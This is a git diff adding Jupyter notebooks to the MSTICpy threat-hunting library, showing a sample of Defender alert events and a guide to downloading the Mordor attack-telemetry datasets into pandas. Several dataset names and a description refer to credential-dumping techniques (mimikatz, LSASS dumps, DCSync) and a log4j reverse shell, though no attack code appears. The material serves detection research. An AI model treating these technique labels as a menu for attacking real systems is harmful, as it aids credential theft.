+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>powershell.exe</td>\n",
+       "      <td>36c5d12033b2eaf251bae61c00690ffb17fddc87</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>915</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>8</td>\n",
+       "      <td>da637111691253610692_623907060</td>\n",
+       "      <td>2019-12-05T16:50:16.9477916Z</td>\n",
+       "      <td>be333ec5312b6aaf4936cc33784577857108bc3a</td>\n",
+       "      <td>arifb-win10edun-1903</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>cmd.exe</td>\n",
+       "      <td>8dca9749cd48d286950e7a9fa1088c937cbccad4</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>915</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <td>9</td>\n",
+       "      <td>da637111536085551266_1012263407</td>\n",
+       "      <td>2019-12-08T15:59:28.1181531Z</td>\n",
+       "      <td>f17cf15efe963a9810a0ad1c1842db543bba8775</td>\n",
+       "      <td>pradeepg-win10entn-1809</td>\n",
+       "      <td>Informational</td>\n",
+       "      <td>Execution</td>\n",
+       "      <td>[Test Alert] Suspicious Powershell commandline</td>\n",
+       "      <td>cmd.exe</td>\n",
+       "      <td>8c5437cd76a89ec983e3b364e219944da3dab464</td>\n",
+       "      <td></td>\n",
+       "      <td></td>\n",
+       "      <td>130</td>\n",
+       "      <td>ProcessCreationEvents</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                            AlertId                     EventTime  \\\n",
+       "0   da637111553314888493_-215032980  2019-12-08T17:22:37.8742974Z   \n",
+       "1   da637111536085551266_1012263407   2019-12-08T17:11:14.931633Z   \n",
+       "2  da637111470533220658_-1814166510  2019-12-05T12:34:34.7864124Z   \n",
+       "3   da637111448595540767_-885088719  2019-12-05T12:11:25.5486226Z   \n",
+       "4  da637111691236503999_-1316647445  2019-12-05T16:56:18.6397738Z   \n",
+       "5  da637111835325717564_-1865655676  2019-12-05T16:05:46.4778106Z   \n",
+       "6  da637111835325717564_-1865655676  2019-12-05T16:05:46.4778106Z   \n",
+       "7    da637111691253610692_623907060  2019-12-05T16:50:16.9477916Z   \n",
+       "8    da637111691253610692_623907060  2019-12-05T16:50:16.9477916Z   \n",
+       "9   da637111536085551266_1012263407  2019-12-08T15:59:28.1181531Z   \n",
+       "\n",
+       "                                  MachineId             ComputerName  \\\n",
+       "0  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "1  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "2  1e9f8f18585e70ef1f167fbf5e8bf7c3dccc5739       olaa-win10pro-1607   \n",
+       "3  499bdd5330f78dc82d0051c8d7a9eb9d69f88333    nestorw-win10pro-1803   \n",
+       "4  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "5  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "6  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "7  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "8  be333ec5312b6aaf4936cc33784577857108bc3a     arifb-win10edun-1903   \n",
+       "9  f17cf15efe963a9810a0ad1c1842db543bba8775  pradeepg-win10entn-1809   \n",
+       "\n",
+       "        Severity        Category  \\\n",
+       "0         Medium  DefenseEvasion   \n",
+       "1  Informational       Execution   \n",
+       "2  Informational       Execution   \n",
+       "3  Informational       Execution   \n",
+       "4         Medium  DefenseEvasion   \n",
+       "5         Medium  DefenseEvasion   \n",
+       "6         Medium  DefenseEvasion   \n",
+       "7  Informational       Execution   \n",
+       "8  Informational       Execution   \n",
+       "9  Informational       Execution   \n",
+       "\n",
+       "                                            Title           FileName  \\\n",
+       "0           Suspicious process injection observed        notepad.exe   \n",
+       "1  [Test Alert] Suspicious Powershell commandline            cmd.exe   \n",
+       "2  [Test Alert] Suspicious Powershell commandline            cmd.exe   \n",
+       "3  [Test Alert] Suspicious Powershell commandline     powershell.exe   \n",
+       "4           Suspicious process injection observed  RuntimeBroker.exe   \n",
+       "5           Suspicious process injection observed     powershell.exe   \n",
+       "6           Suspicious process injection observed        notepad.exe   \n",
+       "7  [Test Alert] Suspicious Powershell commandline     powershell.exe   \n",
+       "8  [Test Alert] Suspicious Powershell commandline            cmd.exe   \n",
+       "9  [Test Alert] Suspicious Powershell commandline            cmd.exe   \n",
+       "\n",
+       "                                       SHA1 RemoteUrl RemoteIP  ReportId  \\\n",
+       "0  b6d237154f2e528f0b503b58b025862d66b02b73                          454   \n",
+       "1  8c5437cd76a89ec983e3b364e219944da3dab464                          137   \n",
+       "2  99ae9c73e9bee6f9c76d6f4093a9882df06832cf                         4369   \n",
+       "3  1b3b40fbc889fd4c645cc12c85d0805ac36ba254                        14968   \n",
+       "4  7ae43b9b9df5c5b8c0b26c36ff02557ceef13e27                         1190   \n",
+       "5  36c5d12033b2eaf251bae61c00690ffb17fddc87                         2376   \n",
+       "6  d487580502354c61808c7180d1a336beb7ad4624                         2376   \n",
+       "7  36c5d12033b2eaf251bae61c00690ffb17fddc87                          915   \n",
+       "8  8dca9749cd48d286950e7a9fa1088c937cbccad4                          915   \n",
+       "9  8c5437cd76a89ec983e3b364e219944da3dab464                          130   \n",
+       "\n",
+       "                   Table  \n",
+       "0             MiscEvents  \n",
+       "1  ProcessCreationEvents  \n",
+       "2  ProcessCreationEvents  \n",
+       "3  ProcessCreationEvents  \n",
+       "4             MiscEvents  \n",
+       "5             MiscEvents  \n",
+       "6             MiscEvents  \n",
+       "7  ProcessCreationEvents  \n",
+       "8  ProcessCreationEvents  \n",
+       "9  ProcessCreationEvents  "
+      ]
+     },
+     "execution_count": 43,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "query = \"AlertEvents | sample 10\"\n",
+    "md_prov.exec_query(query)"
+   ]
+  }
+ ],
+ "metadata": {
+  "kernelspec": {
+   "display_name": "Python 3",
+   "language": "python",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.7.1"
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {},
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 2
+}
diff --git a/docs/notebooks/MordorData.ipynb b/docs/notebooks/MordorData.ipynb
new file mode 100644
index 000000000..2037c7064
--- /dev/null
+++ b/docs/notebooks/MordorData.ipynb
@@ -0,0 +1,846 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# MSTICpy - Mordor data provider and browser\n",
+    "\n",
+    "### Description\n",
+    "This notebook provides a guided example of using the Mordor data provider and browser included with MSTICpy.\n",
+    "\n",
+    "For more information on the Mordor data sets see the [Open Threat Research Forge Mordor GitHub repo](https://github.com/OTRF/mordor)\n",
+    "\n",
+    "You must have msticpy installed to run this notebook:\n",
+    "```\n",
+    "%pip install --upgrade msticpy\n",
+    "```\n",
+    "\n",
+    "MSTICpy versions >= 0.8.5\n",
+    "\n",
+    "### Contents:\n",
+    "- Using the Mordor data provider to retrieve data sets\n",
+    "  - Listing queries\n",
+    "  - Running a query to retrieve data\n",
+    "  - Optional parameters\n",
+    "  - Searching for queries by Mordor property\n",
+    "- Mordor Browser\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Using the Data Provider to download datasets\n",
+    "\n",
+    "Using the data provider you can download and render event data as a pandas DataFrame.\n",
+    "\n",
+    "> **Note** - Mordor includes both host event data and network capture data.<br>\n",
+    "> Although Capture files can be downloaded and unpacked<br>\n",
+    "> they currently cannot be populated into a pandas DataFrame.\n",
+    "> This is the case for most `network` datasets.<br>\n",
+    "> `Host` event data is retrieved and populated into DataFrames.\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Retrieving Mitre data...\n",
+      "Retrieving Mordor data...\n"
+     ]
+    }
+   ],
+   "source": [
+    "from msticpy.data import QueryProvider\n",
+    "\n",
+    "CACHE_FOLDER = \"~/.msticpy/mordor\"\n",
+    "mdr_data = QueryProvider(\"Mordor\", save_folder=CACHE_FOLDER)\n",
+    "mdr_data.connect()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### List Queries\n",
+    "\n",
+    "> Note: Many Mordor data entries have multiple data sets, so we see more queries than Mordor entries.\n",
+    "\n",
+    "(Only first 15 shown)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "['atomic.aws.collection.ec2_proxy_s3_exfiltration',\n",
+       " 'atomic.linux.defense_evasion.host.sh_binary_padding_dd',\n",
+       " 'atomic.linux.discovery.host.sh_arp_cache',\n",
+       " 'atomic.linux.initial_access.network.log4jshell_reversheshell_netcat',\n",
+       " 'atomic.windows.collection.host.msf_record_mic',\n",
+       " 'atomic.windows.credential_access.host.cmd_lsass_memory_dumpert_syscalls',\n",
+       " 'atomic.windows.credential_access.host.cmd_psexec_lsa_secrets_dump',\n",
+       " 'atomic.windows.credential_access.host.cmd_sam_copy_esentutl',\n",
+       " 'atomic.windows.credential_access.host.covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges',\n",
+       " 'atomic.windows.credential_access.host.empire_dcsync_dcerpc_drsuapi_DsGetNCChanges',\n",
+       " 'atomic.windows.credential_access.host.empire_mimikatz_backupkeys_dcerpc_smb_lsarpc',\n",
+       " 'atomic.windows.credential_access.host.empire_mimikatz_extract_keys',\n",
+       " 'atomic.windows.credential_access.host.empire_mimikatz_logonpasswords',\n",
+       " 'atomic.windows.credential_access.host.empire_mimikatz_lsadump_patch',\n",
+       " 'atomic.windows.credential_access.host.empire_mimikatz_sam_access']"
+      ]
+     },
+     "execution_count": 3,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "mdr_data.list_queries()[:15]"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Retrieving/querying a data set"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 13,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges.zip\n",
+      "Extracting covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges_2020-08-05020926.json\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>@version</th>\n",
+       "      <th>Keywords</th>\n",
+       "      <th>ThreadID</th>\n",
+       "      <th>Version</th>\n",
+       "      <th>DestAddress</th>\n",
+       "      <th>host</th>\n",
+       "      <th>LayerRTID</th>\n",
+       "      <th>Message</th>\n",
+       "      <th>SourceModuleName</th>\n",
+       "      <th>SourceName</th>\n",
+       "      <th>...</th>\n",
+       "      <th>Properties</th>\n",
+       "      <th>OperationType</th>\n",
+       "      <th>QueryName</th>\n",
+       "      <th>QueryResults</th>\n",
+       "      <th>QueryStatus</th>\n",
+       "      <th>PipeName</th>\n",
+       "      <th>DisabledPrivilegeList</th>\n",
+       "      <th>EnabledPrivilegeList</th>\n",
+       "      <th>ShareLocalPath</th>\n",
+       "      <th>RelativeTargetName</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>1</td>\n",
+       "      <td>-9214364837600034816</td>\n",
+       "      <td>4888</td>\n",
+       "      <td>1</td>\n",
+       "      <td>239.255.255.250</td>\n",
+       "      <td>wec.internal.cloudapp.net</td>\n",
+       "      <td>44.0</td>\n",
+       "      <td>The Windows Filtering Platform has permitted a...</td>\n",
+       "      <td>eventlog</td>\n",
+       "      <td>Microsoft-Windows-Security-Auditing</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>1</td>\n",
+       "      <td>-9223372036854775808</td>\n",
+       "      <td>4452</td>\n",
+       "      <td>2</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>wec.internal.cloudapp.net</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>File created:\\r\\nRuleName: -\\r\\nUtcTime: 2020-...</td>\n",
+       "      <td>eventlog</td>\n",
+       "      <td>Microsoft-Windows-Sysmon</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>1</td>\n",
+       "      <td>-9223372036854775808</td>\n",
+       "      <td>4452</td>\n",
+       "      <td>2</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>wec.internal.cloudapp.net</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>RawAccessRead detected:\\r\\nRuleName: -\\r\\nUtcT...</td>\n",
+       "      <td>eventlog</td>\n",
+       "      <td>Microsoft-Windows-Sysmon</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>3 rows × 145 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "   @version             Keywords  ThreadID  Version      DestAddress  \\\n",
+       "0         1 -9214364837600034816      4888        1  239.255.255.250   \n",
+       "1         1 -9223372036854775808      4452        2              NaN   \n",
+       "2         1 -9223372036854775808      4452        2              NaN   \n",
+       "\n",
+       "                        host  LayerRTID  \\\n",
+       "0  wec.internal.cloudapp.net       44.0   \n",
+       "1  wec.internal.cloudapp.net        NaN   \n",
+       "2  wec.internal.cloudapp.net        NaN   \n",
+       "\n",
+       "                                             Message SourceModuleName  \\\n",
+       "0  The Windows Filtering Platform has permitted a...         eventlog   \n",
+       "1  File created:\\r\\nRuleName: -\\r\\nUtcTime: 2020-...         eventlog   \n",
+       "2  RawAccessRead detected:\\r\\nRuleName: -\\r\\nUtcT...         eventlog   \n",
+       "\n",
+       "                            SourceName  ...  Properties OperationType  \\\n",
+       "0  Microsoft-Windows-Security-Auditing  ...         NaN           NaN   \n",
+       "1             Microsoft-Windows-Sysmon  ...         NaN           NaN   \n",
+       "2             Microsoft-Windows-Sysmon  ...         NaN           NaN   \n",
+       "\n",
+       "  QueryName QueryResults QueryStatus  PipeName  DisabledPrivilegeList  \\\n",
+       "0       NaN          NaN         NaN       NaN                    NaN   \n",
+       "1       NaN          NaN         NaN       NaN                    NaN   \n",
+       "2       NaN          NaN         NaN       NaN                    NaN   \n",
+       "\n",
+       "  EnabledPrivilegeList ShareLocalPath RelativeTargetName  \n",
+       "0                  NaN            NaN                NaN  \n",
+       "1                  NaN            NaN                NaN  \n",
+       "2                  NaN            NaN                NaN  \n",
+       "\n",
+       "[3 rows x 145 columns]"
+      ]
+     },
+     "execution_count": 13,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "mdr_data.atomic.windows.credential_access.host.covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges().head(3)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Optional parameters\n",
+    "\n",
+    "The data provider and the query functions support some parameters to control\n",
+    "aspects of the query operation.\n",
+    "\n",
+    "-  **use_cached** : bool, optional<br>\n",
+    "   Try to use locally saved file first,\n",
+    "   by default True. If you’ve previously downloaded a file, it will use\n",
+    "   this rather than downloading a new copy.\n",
+    "-  **save_folder** : str, optional<br>\n",
+    "   Path to output folder, by default\n",
+    "   \".\". The path that downloaded and extracted files are saved to.\n",
+    "-  **silent** : bool<br>\n",
+    "   If True, suppress feedback. By default, False.\n",
+    "\n",
+    "If you specify these when you initialize the data provider, the settings\n",
+    "will apply to all queries."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 14,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Retrieving Mitre data...\n",
+      "Retrieving Mordor data...\n"
+     ]
+    }
+   ],
+   "source": [
+    "mdr_data = QueryProvider(\"Mordor\", save_folder=\"./mordor\")\n",
+    "mdr_data.connect()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Using these parameters in the query will override the provider settings\n",
+    "and defaults for that query."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 15,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>@version</th>\n",
+       "      <th>Keywords</th>\n",
+       "      <th>ThreadID</th>\n",
+       "      <th>Version</th>\n",
+       "      <th>DestAddress</th>\n",
+       "      <th>host</th>\n",
+       "      <th>LayerRTID</th>\n",
+       "      <th>Message</th>\n",
+       "      <th>SourceModuleName</th>\n",
+       "      <th>SourceName</th>\n",
+       "      <th>...</th>\n",
+       "      <th>Properties</th>\n",
+       "      <th>OperationType</th>\n",
+       "      <th>QueryName</th>\n",
+       "      <th>QueryResults</th>\n",
+       "      <th>QueryStatus</th>\n",
+       "      <th>PipeName</th>\n",
+       "      <th>DisabledPrivilegeList</th>\n",
+       "      <th>EnabledPrivilegeList</th>\n",
+       "      <th>ShareLocalPath</th>\n",
+       "      <th>RelativeTargetName</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>1</td>\n",
+       "      <td>-9214364837600034816</td>\n",
+       "      <td>4888</td>\n",
+       "      <td>1</td>\n",
+       "      <td>239.255.255.250</td>\n",
+       "      <td>wec.internal.cloudapp.net</td>\n",
+       "      <td>44.0</td>\n",
+       "      <td>The Windows Filtering Platform has permitted a...</td>\n",
+       "      <td>eventlog</td>\n",
+       "      <td>Microsoft-Windows-Security-Auditing</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>1</td>\n",
+       "      <td>-9223372036854775808</td>\n",
+       "      <td>4452</td>\n",
+       "      <td>2</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>wec.internal.cloudapp.net</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>File created:\\r\\nRuleName: -\\r\\nUtcTime: 2020-...</td>\n",
+       "      <td>eventlog</td>\n",
+       "      <td>Microsoft-Windows-Sysmon</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>2 rows × 145 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "   @version             Keywords  ThreadID  Version      DestAddress  \\\n",
+       "0         1 -9214364837600034816      4888        1  239.255.255.250   \n",
+       "1         1 -9223372036854775808      4452        2              NaN   \n",
+       "\n",
+       "                        host  LayerRTID  \\\n",
+       "0  wec.internal.cloudapp.net       44.0   \n",
+       "1  wec.internal.cloudapp.net        NaN   \n",
+       "\n",
+       "                                             Message SourceModuleName  \\\n",
+       "0  The Windows Filtering Platform has permitted a...         eventlog   \n",
+       "1  File created:\\r\\nRuleName: -\\r\\nUtcTime: 2020-...         eventlog   \n",
+       "\n",
+       "                            SourceName  ...  Properties OperationType  \\\n",
+       "0  Microsoft-Windows-Security-Auditing  ...         NaN           NaN   \n",
+       "1             Microsoft-Windows-Sysmon  ...         NaN           NaN   \n",
+       "\n",
+       "  QueryName QueryResults QueryStatus  PipeName  DisabledPrivilegeList  \\\n",
+       "0       NaN          NaN         NaN       NaN                    NaN   \n",
+       "1       NaN          NaN         NaN       NaN                    NaN   \n",
+       "\n",
+       "  EnabledPrivilegeList ShareLocalPath RelativeTargetName  \n",
+       "0                  NaN            NaN                NaN  \n",
+       "1                  NaN            NaN                NaN  \n",
+       "\n",
+       "[2 rows x 145 columns]"
+      ]
+     },
+     "execution_count": 15,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "mdr_data.atomic.windows.credential_access.host.covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges(silent=True, save_folder=\"./mordor\").head(2)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 16,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      " Volume in drive E has no label.\n",
+      " Volume Serial Number is 7E50-19F7\n",
+      "\n",
+      " Directory of e:\\src\\microsoft\\msticpy\\docs\\notebooks\\mordor\n",
+      "\n",
+      "01/06/2022  05:15 PM    <DIR>          .\n",
+      "01/06/2022  05:15 PM    <DIR>          ..\n",
+      "01/06/2022  05:15 PM            76,924 atomic-windows-credential_access-host-covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges.zip\n",
+      "01/06/2022  05:15 PM         1,651,230 covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges_2020-08-05020926.json\n",
+      "               2 File(s)      1,728,154 bytes\n",
+      "               2 Dir(s)  227,291,512,832 bytes free\n"
+     ]
+    }
+   ],
+   "source": [
+    "!dir mordor"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Getting summary data about a query\n",
+    "\n",
+    "Call the query function with a single \"?\" parameter."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 17,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Query:  covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges\n",
+      "Data source:  Mordor\n",
+      "Covenant DCSync\n",
+      "\n",
+      "Notes\n",
+      "-----\n",
+      "Mordor ID: SDWIN-200805020926\n",
+      "This dataset represents adversaries abusing Active Directory Replication services to retrieve secret domain data (i.e. NTLM hashes) from domain accounts.\n",
+      "\n",
+      "Mitre Techniques: T1003: OS Credential Dumping\n",
+      "Mitre Tactics: TA0006: Credential Access\n",
+      "\n",
+      "Parameters\n",
+      "----------\n",
+      "Query:\n",
+      "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges.zip\n"
+     ]
+    }
+   ],
+   "source": [
+    "mdr_data.atomic.windows.credential_access.host.covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges(\"?\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Searching for Queries with QueryProvider.search_queries()\n",
+    "Search queries for matching attributes.\n",
+    "\n",
+    "#### Parameters\n",
+    "\n",
+    "**search** : str  Search string. \n",
+    "\n",
+    "Substrings separated by commas will be treated as OR terms - e.g. \"a, b\" == \"a\" or \"b\".<br>\n",
+    "Substrings separated by \"+\" will be treated as AND terms - e.g. \"a + b\" == \"a\" and \"b\"\n",
+    "\n",
+    "#### Returns\n",
+    "List of matching query names."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 18,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "['atomic.aws.collection.ec2_proxy_s3_exfiltration (AWS Cloud Bank Breach S3)']"
+      ]
+     },
+     "execution_count": 18,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "mdr_data.search_queries(\"AWS\")"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 19,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "['atomic.windows.defense_evasion.host.empire_powerview_ldap_ntsecuritydescriptor (Empire Powerview Add-DomainObjectAcl)',\n",
+       " 'atomic.windows.defense_evasion.network.empire_powerview_ldap_ntsecuritydescriptor (Empire Powerview Add-DomainObjectAcl)']"
+      ]
+     },
+     "execution_count": 19,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "mdr_data.search_queries(\"Empire + T1222\")"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 20,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "['atomic.windows.credential_access.host.empire_mimikatz_sam_access (Empire Mimikatz SAM Extract Hashes)',\n",
+       " 'atomic.windows.defense_evasion.host.empire_wdigest_downgrade.tar (Empire WDigest Downgrade)',\n",
+       " 'atomic.windows.credential_access.host.empire_dcsync_dcerpc_drsuapi_DsGetNCChanges (Empire DCSync)',\n",
+       " 'atomic.windows.credential_access.network.empire_dcsync_dcerpc_drsuapi_DsGetNCChanges (Empire DCSync)',\n",
+       " 'atomic.windows.credential_access.host.empire_mimikatz_lsadump_patch (Empire Mimikatz Lsadump LSA Patch)',\n",
+       " 'atomic.windows.credential_access.host.empire_mimikatz_logonpasswords (Empire Mimikatz LogonPasswords)']"
+      ]
+     },
+     "execution_count": 20,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "mdr_data.search_queries(\"Empire + Credential\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Mordor Browser\n",
+    "\n",
+    "We've also built a more specialized browser for Mordor data. This uses the metadata in the repository to let you view full details of the dataset.\n",
+    "\n",
+    "You can also preview the dataset (if it is convertible to a DataFrame).\n",
+    "\n",
+    "For details of the data shown please see the [Mordor GitHub repo](https://github.com/OTRF/mordor)<br> and the [Threat Hunter Playbook](https://threathunterplaybook.com/introduction.html)\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 21,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Retrieving Mitre data...\n",
+      "Retrieving Mordor data...\n"
+     ]
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "06471b702a984bc9a3c519a103e93174",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(VBox(children=(HTML(value='<h2>Mordor dataset browser</h2>'), Select(description='Data sets', l…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "from msticpy.data.browsers.mordor_browser import MordorBrowser\n",
+    "\n",
